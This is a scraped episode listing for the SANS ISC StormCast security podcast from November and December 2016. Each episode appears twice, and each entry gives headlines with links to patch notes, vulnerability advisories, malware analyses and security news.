12/15/20165 minutes, 28 seconds
Episode Artwork

ISC StormCast for Wednesday, December 14th 2016

Microsoft Patch Tuesday + Adobe Flash https://isc.sans.edu/mspatchdays.html?viewday=2016-12-13 Apple Updates https://support.apple.com/en-us/HT201222 More Netgear Products Vulnerable; Beta Patch Available http://kb.netgear.com/000036386/CVE-2016-582384?cid=wmt_netgear_organic iOS Profile Vulnerability PoC Available https://cxsecurity.com/issue/WLB-2016110046
12/14/20165 minutes, 2 seconds
Episode Artwork

ISC StormCast for Wednesday, December 14th 2016

Microsoft Patch Tuesday + Adobe Flash https://isc.sans.edu/mspatchdays.html?viewday=2016-12-13 Apple Updates https://support.apple.com/en-us/HT201222 More Netgear Products Vulnerable; Beta Patch Available http://kb.netgear.com/000036386/CVE-2016-582384?cid=wmt_netgear_organic iOS Profile Vulnerability PoC Available https://cxsecurity.com/issue/WLB-2016110046
12/14/20165 minutes, 2 seconds
Episode Artwork

ISC StormCast for Tuesday, December 13th 2016

Apple Releases Patches for iOS/WatchOS and tvOS https://support.apple.com/en-us/HT201222 Windows 8/10 Update Causing DHCP Problems https://community.plus.net/t5/Broadband/Windows-8-10-Issues/m-p/1393675#M310992 McAfee VirusScan Enterprise for Linux Vulnerabilities https://nation.state.actor/mcafee.html Snowball Marketing for Ransomware https://www.bleepingcomputer.com/news/security/new-scheme-spread-popcorn-time-ransomware-get-chance-of-free-decryption-key/ Europol Arrests DDoS Miscreants http://www.theregister.co.uk/2016/12/12/europol_arrests_34_ddos_kiddies/ 5 Questions to Ask you IoT Vendor https://isc.sans.edu/forums/diary/5+Questions+to+Ask+your+IoT+Vendors+But+Do+Not+Expect+an+Answer/21807/
12/13/20165 minutes, 49 seconds
Episode Artwork

ISC StormCast for Tuesday, December 13th 2016

Apple Releases Patches for iOS/WatchOS and tvOS https://support.apple.com/en-us/HT201222 Windows 8/10 Update Causing DHCP Problems https://community.plus.net/t5/Broadband/Windows-8-10-Issues/m-p/1393675#M310992 McAfee VirusScan Enterprise for Linux Vulnerabilities https://nation.state.actor/mcafee.html Snowball Marketing for Ransomware https://www.bleepingcomputer.com/news/security/new-scheme-spread-popcorn-time-ransomware-get-chance-of-free-decryption-key/ Europol Arrests DDoS Miscreants http://www.theregister.co.uk/2016/12/12/europol_arrests_34_ddos_kiddies/ 5 Questions to Ask you IoT Vendor https://isc.sans.edu/forums/diary/5+Questions+to+Ask+your+IoT+Vendors+But+Do+Not+Expect+an+Answer/21807/
12/13/20165 minutes, 49 seconds
Episode Artwork

ISC StormCast for Monday, December 12th 2016

Malware Uses NTP to Prevent Reverse Analsys https://isc.sans.edu/forums/diary/Sleeping+VBS+Really+Wants+To+Sleep/21801/ PwC ACE Tool For SAP Introduces Security Vulnerability into SAP http://seclists.org/fulldisclosure/2016/Dec/33 Steganography Used to Hide Exploits in Images https://isc.sans.edu/forums/diary/Steganography+in+Action+Image+Steganography+StegExpose/21803/ Netgear R7000 and R6400 Aribtrary Command Execution http://www.kb.cert.org/vuls/id/582384 Holiday Hack Challenge https://holidayhackchallenge.com
12/11/20165 minutes, 47 seconds
Episode Artwork

ISC StormCast for Monday, December 12th 2016

Malware Uses NTP to Prevent Reverse Analsys https://isc.sans.edu/forums/diary/Sleeping+VBS+Really+Wants+To+Sleep/21801/ PwC ACE Tool For SAP Introduces Security Vulnerability into SAP http://seclists.org/fulldisclosure/2016/Dec/33 Steganography Used to Hide Exploits in Images https://isc.sans.edu/forums/diary/Steganography+in+Action+Image+Steganography+StegExpose/21803/ Netgear R7000 and R6400 Aribtrary Command Execution http://www.kb.cert.org/vuls/id/582384 Holiday Hack Challenge https://holidayhackchallenge.com
12/11/20165 minutes, 47 seconds
Episode Artwork

ISC StormCast for Friday, December 9th 2016

Domaincops Malware https://isc.sans.edu/forums/diary/Good+Cop+Bad+Cop+Domain+Cop/21795/ Yahoo Mail Persistent XSS https://klikki.fi/adv/yahoo2.html Trend Office Scan False Positives https://www.reddit.com/r/sysadmin/comments/5gs2gv/anyone_else_also_affected_by_a_deleted/ Linux Privilege Escalation due ot af_packet.c race condition http://seclists.org/oss-sec/2016/q4/607
12/9/20165 minutes, 58 seconds
Episode Artwork

ISC StormCast for Friday, December 9th 2016

Domaincops Malware https://isc.sans.edu/forums/diary/Good+Cop+Bad+Cop+Domain+Cop/21795/ Yahoo Mail Persistent XSS https://klikki.fi/adv/yahoo2.html Trend Office Scan False Positives https://www.reddit.com/r/sysadmin/comments/5gs2gv/anyone_else_also_affected_by_a_deleted/ Linux Privilege Escalation due ot af_packet.c race condition http://seclists.org/oss-sec/2016/q4/607
12/9/20165 minutes, 58 seconds
Episode Artwork

ISC StormCast for Thursday, December 8th 2016

Attackers are using AV Exclusion Lists to Bypass AV http://www.theregister.co.uk/2016/12/07/clever_crims_using_av_exclusion_lists_as_malware_safe_harbour/ Android Update Patches "Dirty Cow" https://source.android.com/security/bulletin/2016-12-01.html "Goldeneye" Ransomware May Use Stolen Data For Realistic E-Mails https://www.heise.de/security/meldung/Goldeneye-nutzt-Informationen-vom-Arbeitsamt-fuer-aeusserst-gezielte-Angriffe-3564386.html Firefox Cross Domain Cookie Vulnerability https://insert-script.blogspot.ch/2016/12/firefox-svg-cross-domain-cookie.html
12/8/20166 minutes
Episode Artwork

ISC StormCast for Thursday, December 8th 2016

Attackers are using AV Exclusion Lists to Bypass AV http://www.theregister.co.uk/2016/12/07/clever_crims_using_av_exclusion_lists_as_malware_safe_harbour/ Android Update Patches "Dirty Cow" https://source.android.com/security/bulletin/2016-12-01.html "Goldeneye" Ransomware May Use Stolen Data For Realistic E-Mails https://www.heise.de/security/meldung/Goldeneye-nutzt-Informationen-vom-Arbeitsamt-fuer-aeusserst-gezielte-Angriffe-3564386.html Firefox Cross Domain Cookie Vulnerability https://insert-script.blogspot.ch/2016/12/firefox-svg-cross-domain-cookie.html
12/8/20166 minutes
Episode Artwork

ISC StormCast for Wednesday, December 7th 2016

Attacking NoSQL Applications https://isc.sans.edu/forums/diary/Attacking+NoSQL+applications/21787/ Heap Buffer Overflow in Encase Forensic Imager https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20161128-0_Guidance_Software_Encase_DoS_heap_buffer_overflow_vulnerabilities_v10.txt Raspbian To Increase Default Security https://www.raspberrypi.org/blog/a-security-update-for-raspbian-pixel/ SONY Camera Backdoor https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20161206-0_Sony_IPELA_Engine_IP_Cameras_Backdoors_v10.txt Feedback: https://isc.sans.edu/contact.html
12/7/20166 minutes, 30 seconds
Episode Artwork

ISC StormCast for Wednesday, December 7th 2016

Attacking NoSQL Applications https://isc.sans.edu/forums/diary/Attacking+NoSQL+applications/21787/ Heap Buffer Overflow in Encase Forensic Imager https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20161128-0_Guidance_Software_Encase_DoS_heap_buffer_overflow_vulnerabilities_v10.txt Raspbian To Increase Default Security https://www.raspberrypi.org/blog/a-security-update-for-raspbian-pixel/ SONY Camera Backdoor https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20161206-0_Sony_IPELA_Engine_IP_Cameras_Backdoors_v10.txt Feedback: https://isc.sans.edu/contact.html
12/7/20166 minutes, 30 seconds
Episode Artwork

ISC StormCast for Tuesday, December 6th 2016

Video Walk Through: Analysing Hancitor Malicious Document https://isc.sans.edu/forums/diary/Hancitor+Maldoc+Videos/21783/ Rapid Distributed Credit Card Number Brute Forcing http://eprint.ncl.ac.uk/file_store/production/230123/19180242-D02E-47AC-BDB3-73C22D6E1FDB.pdf Cloudflare Detecting Large DDoS Attacks Over Thanksgiving / Cyber Monday https://blog.cloudflare.com/the-daily-ddos-ten-days-of-massive-attacks/ Free Windows Tool to Harden Networks: SAMRi10 https://gallery.technet.microsoft.com/SAMRi10-Hardening-Remote-48d94b5b NY State Outlawing Automated Ticket Purchasing Software https://www.nysenate.gov/legislation/bills/2015/S8123
12/6/20165 minutes, 30 seconds
Episode Artwork

ISC StormCast for Tuesday, December 6th 2016

Video Walk Through: Analysing Hancitor Malicious Document https://isc.sans.edu/forums/diary/Hancitor+Maldoc+Videos/21783/ Rapid Distributed Credit Card Number Brute Forcing http://eprint.ncl.ac.uk/file_store/production/230123/19180242-D02E-47AC-BDB3-73C22D6E1FDB.pdf Cloudflare Detecting Large DDoS Attacks Over Thanksgiving / Cyber Monday https://blog.cloudflare.com/the-daily-ddos-ten-days-of-massive-attacks/ Free Windows Tool to Harden Networks: SAMRi10 https://gallery.technet.microsoft.com/SAMRi10-Hardening-Remote-48d94b5b NY State Outlawing Automated Ticket Purchasing Software https://www.nysenate.gov/legislation/bills/2015/S8123
12/6/20165 minutes, 30 seconds
Episode Artwork

ISC StormCast for Monday, December 5th 2016

CSP Bypass with Polyglot Images http://blog.portswigger.net/2016/12/bypassing-csp-using-polyglot-jpegs.html also see this Youtube video on Polyglot Images: https://www.youtube.com/watch?v=Ub5G_t-gUBc Stack Overflow SQL Injection Questions https://laurent22.github.io/so-injections/ Mirai Update: More Outages and Vulnerable Chipset Identified http://www.theregister.co.uk/2016/12/02/broadband_mirai_takedown_analysis/ SEC503 Intrusion Detection in Depth in Brussles (Jan 2017): https://www.sans.org/event/brussels-winter-2017/course/intrusion-detection-in-depth
12/4/20165 minutes, 24 seconds
Episode Artwork

ISC StormCast for Monday, December 5th 2016

CSP Bypass with Polyglot Images http://blog.portswigger.net/2016/12/bypassing-csp-using-polyglot-jpegs.html also see this Youtube video on Polyglot Images: https://www.youtube.com/watch?v=Ub5G_t-gUBc Stack Overflow SQL Injection Questions https://laurent22.github.io/so-injections/ Mirai Update: More Outages and Vulnerable Chipset Identified http://www.theregister.co.uk/2016/12/02/broadband_mirai_takedown_analysis/ SEC503 Intrusion Detection in Depth in Brussles (Jan 2017): https://www.sans.org/event/brussels-winter-2017/course/intrusion-detection-in-depth
12/4/20165 minutes, 24 seconds
Episode Artwork

ISC StormCast for Friday, December 2nd 2016

Open Source Tool "Beamgun" Fights Rogue USB Devices on Windows https://github.com/JLospinoso/beamgun "Shamoon" Malware is back with a new destructive attack against Saudi Arabia https://www.bloomberg.com/news/articles/2016-12-01/destructive-hacks-strike-saudi-arabia-posing-challenge-to-trump British ISP "KCOM" Suffering Outage After Attack http://www.hulldailymail.co.uk/kcom-blames-cyber-attack-for-thousands-losing-internet-access-in-hull/story-29944084-detail/story.html#xf23rtZbUqlh5uXY.99 Microsoft Fixes Long Known Priviledge Escalation Issue https://threatpost.com/microsoft-silently-fixes-kernel-bug-that-led-to-chrome-sandbox-bypass/122179/
12/2/20165 minutes, 11 seconds
Episode Artwork

ISC StormCast for Friday, December 2nd 2016

Open Source Tool "Beamgun" Fights Rogue USB Devices on Windows https://github.com/JLospinoso/beamgun "Shamoon" Malware is back with a new destructive attack against Saudi Arabia https://www.bloomberg.com/news/articles/2016-12-01/destructive-hacks-strike-saudi-arabia-posing-challenge-to-trump British ISP "KCOM" Suffering Outage After Attack http://www.hulldailymail.co.uk/kcom-blames-cyber-attack-for-thousands-losing-internet-access-in-hull/story-29944084-detail/story.html#xf23rtZbUqlh5uXY.99 Microsoft Fixes Long Known Priviledge Escalation Issue https://threatpost.com/microsoft-silently-fixes-kernel-bug-that-led-to-chrome-sandbox-bypass/122179/
12/2/20165 minutes, 11 seconds
Episode Artwork

ISC StormCast for Thursday, December 1st 2016

Mozilla Patches Firefox 0-Day (Exploit already avaiable!) https://isc.sans.edu/forums/diary/Unpatched+Vulnerability+in+Firefox+used+to+Attack+Tor+Browser/21769/ SQL Slammer "Resurgance" ? https://isc.sans.edu/forums/diary/Take+Back+Wednesday+SQL+Slammer+still+alive+but+barely+kicking/21767/ Goolian Android Malware http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/ Bypassing SAML 2.0 SSO http://research.aurainfosec.io/bypassing-saml20-SSO/ Webcast: The Six Most Dangerous New Cyber Attack Techniques https://cc.readytalk.com/registration/#/?meeting=9yq9nbx4tp7a&campaign=nggmjhc39guc
11/30/20166 minutes, 27 seconds
Episode Artwork

ISC StormCast for Thursday, December 1st 2016

Mozilla Patches Firefox 0-Day (Exploit already avaiable!) https://isc.sans.edu/forums/diary/Unpatched+Vulnerability+in+Firefox+used+to+Attack+Tor+Browser/21769/ SQL Slammer "Resurgance" ? https://isc.sans.edu/forums/diary/Take+Back+Wednesday+SQL+Slammer+still+alive+but+barely+kicking/21767/ Goolian Android Malware http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/ Bypassing SAML 2.0 SSO http://research.aurainfosec.io/bypassing-saml20-SSO/ Webcast: The Six Most Dangerous New Cyber Attack Techniques https://cc.readytalk.com/registration/#/?meeting=9yq9nbx4tp7a&campaign=nggmjhc39guc
11/30/20166 minutes, 27 seconds
Episode Artwork

ISC StormCast for Wednesday, November 30th 2016

Mirai/TR-069 Update: Deutsche Telekom Routers May have been DDoSed by Traffic Volume, not Exploit https://comsecuris.com/blog/posts/were_900k_deutsche_telekom_routers_compromised_by_mirai/ Bitlocker Encrypted Drives Exposed During System Upgrade http://blog.win-fu.com/2016/11/every-windows-10-in-place-upgrade-is.html Software-Only Defenses Against Rowhammer https://arxiv.org/abs/1611.08396
11/29/20165 minutes, 54 seconds
Episode Artwork

ISC StormCast for Wednesday, November 30th 2016

Mirai/TR-069 Update: Deutsche Telekom Routers May have been DDoSed by Traffic Volume, not Exploit https://comsecuris.com/blog/posts/were_900k_deutsche_telekom_routers_compromised_by_mirai/ Bitlocker Encrypted Drives Exposed During System Upgrade http://blog.win-fu.com/2016/11/every-windows-10-in-place-upgrade-is.html Software-Only Defenses Against Rowhammer https://arxiv.org/abs/1611.08396
11/29/20165 minutes, 54 seconds
Episode Artwork

ISC StormCast for Tuesday, November 29th 2016

Mirai Variant Scanning Port 5555 and 7547 For TR-069/SOAP Vulnerability https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759/ Paypal OAuth Vulnerability http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html
11/29/20165 minutes, 56 seconds
Episode Artwork

ISC StormCast for Tuesday, November 29th 2016

Mirai Variant Scanning Port 5555 and 7547 For TR-069/SOAP Vulnerability https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759/ Paypal OAuth Vulnerability http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html
11/29/20165 minutes, 56 seconds
Episode Artwork

ISC StormCast for Monday, November 28th 2016

Extracting Shellcode from Javascript https://isc.sans.edu/forums/diary/Extracting+Shellcode+From+JavaScript/21753/ Using Scapy to Test CozyDuke Snort Signatures https://isc.sans.edu/forums/diary/Scapy+vs+CozyDuke/21755/ Malicious JPEG Spreading via Facebook http://blog.checkpoint.com/2016/11/24/imagegate-check-point-uncovers-new-method-distributing-malware-images/ San Francisco Public Transport ("MUNI") hit by Ransomware http://sanfrancisco.cbslocal.com/2016/11/26/you-hacked-cyber-attackers-crash-muni-computer-system-across-sf/ Tesla Smartphone App Vulnerability https://promon.co/blog/tesla-cars-can-be-stolen-by-hacking-the-app/
11/28/20166 minutes, 20 seconds
Episode Artwork

ISC StormCast for Monday, November 28th 2016

Extracting Shellcode from Javascript https://isc.sans.edu/forums/diary/Extracting+Shellcode+From+JavaScript/21753/ Using Scapy to Test CozyDuke Snort Signatures https://isc.sans.edu/forums/diary/Scapy+vs+CozyDuke/21755/ Malicious JPEG Spreading via Facebook http://blog.checkpoint.com/2016/11/24/imagegate-check-point-uncovers-new-method-distributing-malware-images/ San Francisco Public Transport ("MUNI") hit by Ransomware http://sanfrancisco.cbslocal.com/2016/11/26/you-hacked-cyber-attackers-crash-muni-computer-system-across-sf/ Tesla Smartphone App Vulnerability https://promon.co/blog/tesla-cars-can-be-stolen-by-hacking-the-app/
11/28/20166 minutes, 20 seconds
Episode Artwork

ISC StormCast for Wednesday, November 23rd 2016

WordPress RCE Via Fake Updates http://www.openwall.com/lists/oss-security/2016/11/21/3 Turning Speakers into Microphones http://cyber.bgu.ac.il/advanced-cyber/system/files/SPEAKEaR.pdf 5 Second Video iOS Crash http://www.cultofmac.com/455215/455215/ "Stubby" Implements Encrypted DNS http://www.theregister.co.uk/2016/11/22/dns_boffins_offer_up_privacy_test/
11/23/20166 minutes, 43 seconds
Episode Artwork

ISC StormCast for Wednesday, November 23rd 2016

WordPress RCE Via Fake Updates http://www.openwall.com/lists/oss-security/2016/11/21/3 Turning Speakers into Microphones http://cyber.bgu.ac.il/advanced-cyber/system/files/SPEAKEaR.pdf 5 Second Video iOS Crash http://www.cultofmac.com/455215/455215/ "Stubby" Implements Encrypted DNS http://www.theregister.co.uk/2016/11/22/dns_boffins_offer_up_privacy_test/
11/23/20166 minutes, 43 seconds
Episode Artwork

ISC StormCast for Tuesday, November 22nd 2016

Encrypted ZIP File With Comments https://isc.sans.edu/forums/diary/ZIP+With+Comment/21737/ Siemens Surveilance Cameras Use Static Default Password https://ics-cert.us-cert.gov/advisories/ICSA-16-322-01 NTP Single Packet DoS Vulnerablity http://dumpco.re/cve-2016-7434/ Windows 10 Does Not Provide the Same Protections as EMET https://insights.sei.cmu.edu/cert/2016/11/windows-10-cannot-protect-insecure-applications-like-emet-can.html
11/21/20165 minutes, 20 seconds
Episode Artwork

ISC StormCast for Tuesday, November 22nd 2016

Encrypted ZIP File With Comments https://isc.sans.edu/forums/diary/ZIP+With+Comment/21737/ Siemens Surveilance Cameras Use Static Default Password https://ics-cert.us-cert.gov/advisories/ICSA-16-322-01 NTP Single Packet DoS Vulnerablity http://dumpco.re/cve-2016-7434/ Windows 10 Does Not Provide the Same Protections as EMET https://insights.sei.cmu.edu/cert/2016/11/windows-10-cannot-protect-insecure-applications-like-emet-can.html
11/21/20165 minutes, 20 seconds
Episode Artwork

ISC StormCast for Monday, November 21st 2016

Converting Timestamps with Epocalypse https://isc.sans.edu/forums/diary/How+many+Epoch+times+Epocalypsepy+timestamp+converter/21733/ SIP Disabled on Some Macbook Pros http://www.macrumors.com/2016/11/17/system-integrity-protection-disabled-macbook-pro/ Spoofing Microsoft.com E-Mails with Outlook.com https://www.utkusen.com/blog/sending-valid-phishing-emails-from-microsoftcom.html Various High Profile Twitter Accounts Hijacked By Spammers https://www.engadget.com/2016/11/19/spammers-compromised-twitter-accounts-for-playstation-and-other/ Dyn Attack Caused by Single Angry Playstation User http://www.wsj.com/articles/october-internet-attack-targeted-playstation-network-researchers-say-1479250847
11/21/20165 minutes, 59 seconds
Episode Artwork

ISC StormCast for Monday, November 21st 2016

Converting Timestamps with Epocalypse https://isc.sans.edu/forums/diary/How+many+Epoch+times+Epocalypsepy+timestamp+converter/21733/ SIP Disabled on Some Macbook Pros http://www.macrumors.com/2016/11/17/system-integrity-protection-disabled-macbook-pro/ Spoofing Microsoft.com E-Mails with Outlook.com https://www.utkusen.com/blog/sending-valid-phishing-emails-from-microsoftcom.html Various High Profile Twitter Accounts Hijacked By Spammers https://www.engadget.com/2016/11/19/spammers-compromised-twitter-accounts-for-playstation-and-other/ Dyn Attack Caused by Single Angry Playstation User http://www.wsj.com/articles/october-internet-attack-targeted-playstation-network-researchers-say-1479250847
11/21/20165 minutes, 59 seconds
Episode Artwork

ISC StormCast for Friday, November 18th 2016

Phishers Protect Phishing Sites from Security Researchers https://isc.sans.edu/forums/diary/Example+of+Getting+Analysts+Researchers+Away/21721/ Fedora / Chrome Automatic Downloads and Code Execution https://scarybeastsecurity.blogspot.de/2016/11/0day-poc-risky-design-decisions-in.html Volutility Version 1.0 Released https://techanarchy.net/2016/11/volutility-version-1-0-release/ iOS Synchronizing Call Logs via iCloud http://www.forbes.com/sites/thomasbrewster/2016/11/17/iphone-call-logs-in-icloud-warns-elcomsoft-hackers/#5d96b21c2936
11/18/20165 minutes, 44 seconds
Episode Artwork

ISC StormCast for Friday, November 18th 2016

Phishers Protect Phishing Sites from Security Researchers https://isc.sans.edu/forums/diary/Example+of+Getting+Analysts+Researchers+Away/21721/ Fedora / Chrome Automatic Downloads and Code Execution https://scarybeastsecurity.blogspot.de/2016/11/0day-poc-risky-design-decisions-in.html Volutility Version 1.0 Released https://techanarchy.net/2016/11/volutility-version-1-0-release/ iOS Synchronizing Call Logs via iCloud http://www.forbes.com/sites/thomasbrewster/2016/11/17/iphone-call-logs-in-icloud-warns-elcomsoft-hackers/#5d96b21c2936
11/18/20165 minutes, 44 seconds
Episode Artwork

ISC StormCast for Thursday, November 17th 2016

Russian Malspam Distributing Troldesh Ransomware https://isc.sans.edu/forums/diary/Malspam+distributing+Troldesh+ransomware/21717/ Poisontap Exploits USB Ethernet Adapters https://samy.pl/poisontap/ Symantec Patches Untrusted DLL Loading Vulnerability https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20161115_00 VMWare Patches VM Escape Vulnerablity http://www.vmware.com/security/advisories/VMSA-2016-0019.html Some Android Phones Leak Data To China http://www.prnewswire.com/news-releases/kryptowire-discovered-mobile-phone-firmware-that-transmitted-personally-identifiable-information-pii-without-user-consent-or-disclosure-300362844.html Jacksonville ISC2 Meeting https://www.eventbrite.com/e/isc2-ne-florida-chapter-meeting-november-2016-tickets-29050701430
11/17/20166 minutes, 2 seconds
Episode Artwork

ISC StormCast for Thursday, November 17th 2016

Russian Malspam Distributing Troldesh Ransomware https://isc.sans.edu/forums/diary/Malspam+distributing+Troldesh+ransomware/21717/ Poisontap Exploits USB Ethernet Adapters https://samy.pl/poisontap/ Symantec Patches Untrusted DLL Loading Vulnerability https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20161115_00 VMWare Patches VM Escape Vulnerablity http://www.vmware.com/security/advisories/VMSA-2016-0019.html Some Android Phones Leak Data To China http://www.prnewswire.com/news-releases/kryptowire-discovered-mobile-phone-firmware-that-transmitted-personally-identifiable-information-pii-without-user-consent-or-disclosure-300362844.html Jacksonville ISC2 Meeting https://www.eventbrite.com/e/isc2-ne-florida-chapter-meeting-november-2016-tickets-29050701430
11/17/20166 minutes, 2 seconds
Episode Artwork

ISC StormCast for Wednesday, November 16th 2016

Vulnerability in LUKS Can Be used to Boot Encrypted Linux Systems http://betanews.com/2016/11/15/linux-security-bug-cryptsetup-luks/ Shazam Keeps Microphone Turned on Even While not "Listening" https://objective-see.com/blog/blog_0x13.html nginx Privilege Escalation Vulnerability (Debian Only) http://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
11/16/20165 minutes, 52 seconds
Episode Artwork

ISC StormCast for Wednesday, November 16th 2016

Vulnerability in LUKS Can Be used to Boot Encrypted Linux Systems http://betanews.com/2016/11/15/linux-security-bug-cryptsetup-luks/ Shazam Keeps Microphone Turned on Even While not "Listening" https://objective-see.com/blog/blog_0x13.html nginx Privilege Escalation Vulnerability (Debian Only) http://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
11/16/20165 minutes, 52 seconds
Episode Artwork

ISC StormCast for Tuesday, November 15th 2016

Indictment for the theft of FIFA Game Coins https://regmedia.co.uk/2016/11/14/fifafraudindictment.pdf Crysis Ransomware Master Encryption Key Released http://www.bleepingcomputer.com/news/security/master-decryption-keys-and-decryptor-for-the-crysis-ransomware-released-/ Adult Friend Finder Breached https://www.leakedsource.com/blog/friendfinder Lightbulb Web Application Firewall Auditing Framework http://seclist.us/lightbulb-is-an-open-source-python-framework-for-auditing-web-applications-firewalls.html
11/15/20165 minutes, 20 seconds
Episode Artwork

ISC StormCast for Tuesday, November 15th 2016

Indictment for the theft of FIFA Game Coins https://regmedia.co.uk/2016/11/14/fifafraudindictment.pdf Crysis Ransomware Master Encryption Key Released http://www.bleepingcomputer.com/news/security/master-decryption-keys-and-decryptor-for-the-crysis-ransomware-released-/ Adult Friend Finder Breached https://www.leakedsource.com/blog/friendfinder Lightbulb Web Application Firewall Auditing Framework http://seclist.us/lightbulb-is-an-open-source-python-framework-for-auditing-web-applications-firewalls.html
11/15/20165 minutes, 20 seconds
Episode Artwork

ISC StormCast for Monday, November 14th 2016

EMET Will Defeat Shell Code Executing Inside Word https://isc.sans.edu/forums/diary/VBA+Shellcode+and+EMET/21705/ Bitcoin Miners Distributed via FTP Exploits https://isc.sans.edu/forums/diary/Bitcoin+Miner+File+Upload+via+FTP/21707/ 5 Russian Banks Suffer DoS Attack https://www.rt.com/news/366172-russian-banks-ddos-attack/ Wifi May Reveal Mobile Phone Passwords http://dl.acm.org/citation.cfm?id=2978397
11/14/20165 minutes, 29 seconds
Episode Artwork

ISC StormCast for Monday, November 14th 2016

EMET Will Defeat Shell Code Executing Inside Word https://isc.sans.edu/forums/diary/VBA+Shellcode+and+EMET/21705/ Bitcoin Miners Distributed via FTP Exploits https://isc.sans.edu/forums/diary/Bitcoin+Miner+File+Upload+via+FTP/21707/ 5 Russian Banks Suffer DoS Attack https://www.rt.com/news/366172-russian-banks-ddos-attack/ Wifi May Reveal Mobile Phone Passwords http://dl.acm.org/citation.cfm?id=2978397
11/14/20165 minutes, 29 seconds
Episode Artwork

ISC StormCast for Friday, November 11th 2016

ICMP Unreachable DoS Attacks https://isc.sans.edu/forums/diary/ICMP+Unreachable+DoS+Attacks+aka+Black+Nurse/21699/ OpenSSL 1.1.0 Patch https://www.openssl.org/news/secadv/20161110.txt OWASP ModSecurity Core Rule Set Version 3.0.0 Release https://lists.owasp.org/pipermail/owasp-modsecurity-core-rule-set/2016-November/002265.html
11/11/20166 minutes, 11 seconds
Episode Artwork

ISC StormCast for Friday, November 11th 2016

ICMP Unreachable DoS Attacks https://isc.sans.edu/forums/diary/ICMP+Unreachable+DoS+Attacks+aka+Black+Nurse/21699/ OpenSSL 1.1.0 Patch https://www.openssl.org/news/secadv/20161110.txt OWASP ModSecurity Core Rule Set Version 3.0.0 Release https://lists.owasp.org/pipermail/owasp-modsecurity-core-rule-set/2016-November/002265.html
11/11/20166 minutes, 11 seconds
Episode Artwork

ISC StormCast for Thursday, November 10th 2016

DoS Attack Turns off Heat for More then a Week http://www.hs.fi/kotimaa/a1478495966653 (finish only) DLink HNAP Vulnerability https://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-hnap-login.txt PoC Exploits Available for Two MSFT Vulnerabilities https://github.com/tinysec/public/tree/master/CVE-2016-7255 https://g-laurent.blogspot.com/2016/11/ms16-137-lsass-remote-memory-corruption.html OpenSSL Patch Pre-Announced https://mta.openssl.org/pipermail/openssl-announce/2016-November/000085.html Hue Lightbulb Exploit/Worm http://iotworm.eyalro.net (Sophos labels this link as "Spam", but appears to be harmless)
11/9/20165 minutes, 27 seconds
Episode Artwork

ISC StormCast for Thursday, November 10th 2016

DoS Attack Turns off Heat for More then a Week http://www.hs.fi/kotimaa/a1478495966653 (finish only) DLink HNAP Vulnerability https://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-hnap-login.txt PoC Exploits Available for Two MSFT Vulnerabilities https://github.com/tinysec/public/tree/master/CVE-2016-7255 https://g-laurent.blogspot.com/2016/11/ms16-137-lsass-remote-memory-corruption.html OpenSSL Patch Pre-Announced https://mta.openssl.org/pipermail/openssl-announce/2016-November/000085.html Hue Lightbulb Exploit/Worm http://iotworm.eyalro.net (Sophos labels this link as "Spam", but appears to be harmless)
11/9/20165 minutes, 27 seconds
Episode Artwork

ISC StormCast for Wednesday, November 9th 2016

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/November+2016+Microsoft+Patch+Day/21689/ Adobe Updates https://helpx.adobe.com/security/products/connect/apsb16-35.html https://helpx.adobe.com/security/products/flash-player/apsb16-37.html
11/8/20167 minutes, 29 seconds
Episode Artwork

ISC StormCast for Wednesday, November 9th 2016

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/November+2016+Microsoft+Patch+Day/21689/ Adobe Updates https://helpx.adobe.com/security/products/connect/apsb16-35.html https://helpx.adobe.com/security/products/flash-player/apsb16-37.html
11/8/20167 minutes, 29 seconds
Episode Artwork

ISC StormCast for Tuesday, November 8th 2016

Tesco Bank Limits Online Banking After Online Criminal Activity https://yourcommunity.tescobank.com/t5/News/Message-for-Current-Account-customers/td-p/6599 Belkin WeMo Devices Used To Attack Mobile Devices https://www.blackhat.com/eu-16/briefings/schedule/index.html#breaking-bhad-abusing-belkin-home-automation-devices-4640 Fake Retail Apps Flooding Apple App Store http://www.nytimes.com/2016/11/07/technology/more-iphone-fake-retail-apps-before-holidays.html?_r=0 Netflix Password Recovery via Phone Call Vulnerability https://slashcrypto.org/2016/11/07/Netflix/ Webcast: 8 Ways To Watch The Invisible: Analyzing Encrypted Network Traffic https://www.sans.org/webcasts/8-ways-watch-invisible-analyzing-encrypted-network-traffic-103277
11/8/20166 minutes, 18 seconds
Episode Artwork

ISC StormCast for Tuesday, November 8th 2016

Tesco Bank Limits Online Banking After Online Criminal Activity https://yourcommunity.tescobank.com/t5/News/Message-for-Current-Account-customers/td-p/6599 Belkin WeMo Devices Used To Attack Mobile Devices https://www.blackhat.com/eu-16/briefings/schedule/index.html#breaking-bhad-abusing-belkin-home-automation-devices-4640 Fake Retail Apps Flooding Apple App Store http://www.nytimes.com/2016/11/07/technology/more-iphone-fake-retail-apps-before-holidays.html?_r=0 Netflix Password Recovery via Phone Call Vulnerability https://slashcrypto.org/2016/11/07/Netflix/ Webcast: 8 Ways To Watch The Invisible: Analyzing Encrypted Network Traffic https://www.sans.org/webcasts/8-ways-watch-invisible-analyzing-encrypted-network-traffic-103277
11/8/20166 minutes, 18 seconds
Episode Artwork

ISC StormCast for Monday, November 7th 2016

